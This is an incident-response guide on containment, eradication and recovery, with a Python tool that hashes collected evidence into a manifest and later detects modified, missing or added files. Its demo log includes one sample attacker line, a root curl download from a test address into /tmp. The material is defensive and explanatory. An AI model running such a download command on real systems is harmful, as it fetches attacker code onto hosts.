Containment, Eradication, and Recovery

  • Containment:

    • Isolate affected systems (e.g., network segmentation, host firewall rules, account lockdown) so the attacker cannot move further or exfiltrate data, while keeping the host powered on if volatile evidence still has to be collected from it.

    • Capture evidence (e.g., memory dumps, disk images, logs) before any action that alters or reboots the host, and record a hash, the collector, and the collection time for each artifact so the evidence can later be shown to be unaltered.

  • Eradication:

    • Remove malware, attacker persistence (backdoors, rogue accounts, scheduled tasks, modified startup items), and the vulnerability or misconfiguration that was exploited.

    • Apply patches, reset credentials and rotate any secrets the attacker could have read, and disable compromised accounts.

  • Recovery:

    • Restore systems from backups taken before the compromise and verified clean; where the initial entry point is unknown, rebuilding from a known-good image is safer than cleaning in place.

    • Validate system integrity (e.g., compare files and configuration against a known-good baseline) and functionality before returning the system to service.

    • Resume normal operations with heightened monitoring for signs of reinfection or the same attacker returning.
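The two integrity steps above, recording hashes when evidence is captured and re-checking a restored system against a known-good baseline, are the same operation: build a manifest of file hashes and later compare a directory against it. The following is an added example, not code from the original page or from Linear; the case ID, collector address and log lines are constructed for the demonstration.

```python
"""Evidence manifest and post-recovery integrity check (added example).

Builds a JSON manifest (SHA-256, size, collector, timestamp) for every file
under a directory, then re-checks a directory against that manifest and
reports files that were modified, removed, or added.
"""
import hashlib
import json
import tempfile
from datetime import datetime, timezone
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large memory dumps do not need to fit in RAM."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path, case_id: str, collector: str) -> dict:
    """Record hash and size of every regular file under root, plus who collected it and when."""
    files = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        files[rel] = {"sha256": sha256_file(path), "size": path.stat().st_size}
    return {
        "case_id": case_id,
        "collector": collector,
        "collected_at": datetime.now(timezone.utc).isoformat(),
        "root": str(root),
        "files": files,
    }


def verify_manifest(root: Path, manifest: dict) -> dict:
    """Compare the current contents of root with a manifest.

    Size is checked first because it is cheap; the hash is only computed when
    the size still matches. Returns sorted lists of modified, missing and
    added paths plus a single 'clean' flag.
    """
    recorded = manifest["files"]
    current = {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}
    modified = [
        rel for rel, meta in recorded.items()
        if rel in current and (
            current[rel].stat().st_size != meta["size"]
            or sha256_file(current[rel]) != meta["sha256"]
        )
    ]
    missing = [rel for rel in recorded if rel not in current]
    added = [rel for rel in current if rel not in recorded]
    return {
        "modified": sorted(modified),
        "missing": sorted(missing),
        "added": sorted(added),
        "clean": not (modified or missing or added),
    }


def demo() -> dict:
    """Constructed scenario: collect a log, write the manifest, then tamper with the copy."""
    with tempfile.TemporaryDirectory() as tmp:
        evidence = Path(tmp) / "evidence"
        (evidence / "var/log").mkdir(parents=True)
        # Constructed sample log lines (TEST-NET addresses), not from any real system.
        auth_log = evidence / "var/log/auth.log"
        auth_log.write_text(
            "Mar 12 02:14:07 web01 sshd[4211]: Accepted password for root from 198.51.100.23 port 51522 ssh2\n"
            "Mar 12 02:14:09 web01 sudo: root : TTY=pts/1 ; COMMAND=/usr/bin/curl -o /tmp/x http://198.51.100.23/x\n"
        )
        # Hypothetical case ID and collector, chosen for the example.
        manifest = build_manifest(evidence, "INC-0001", "analyst@example.com")
        manifest_path = Path(tmp) / "manifest.json"
        manifest_path.write_text(json.dumps(manifest, indent=2))
        reloaded = json.loads(manifest_path.read_text())

        before = verify_manifest(evidence, reloaded)

        # Simulate tampering: a line appended to the log and an unrecorded file dropped in.
        with auth_log.open("a") as fh:
            fh.write("Mar 12 02:20:00 web01 sshd[4211]: Accepted publickey for deploy from 203.0.113.5 port 40000 ssh2\n")
        (evidence / "var/log/syslog").write_text("Mar 12 02:21:00 web01 systemd[1]: Started cron.service\n")
        after = verify_manifest(evidence, reloaded)

        return {
            "before_clean": before["clean"],
            "modified": after["modified"],
            "missing": after["missing"],
            "added": after["added"],
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

For evidence capture, run `build_manifest` over the collection directory immediately after acquisition and store the manifest off the compromised host; an attacker who is still present can otherwise rewrite both a file and its recorded hash. For recovery validation, take the baseline manifest from a known-good image (or from the system before the incident) and run `verify_manifest` against the restored host: anything in `modified` or `added` needs an explanation before the system goes back into service.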
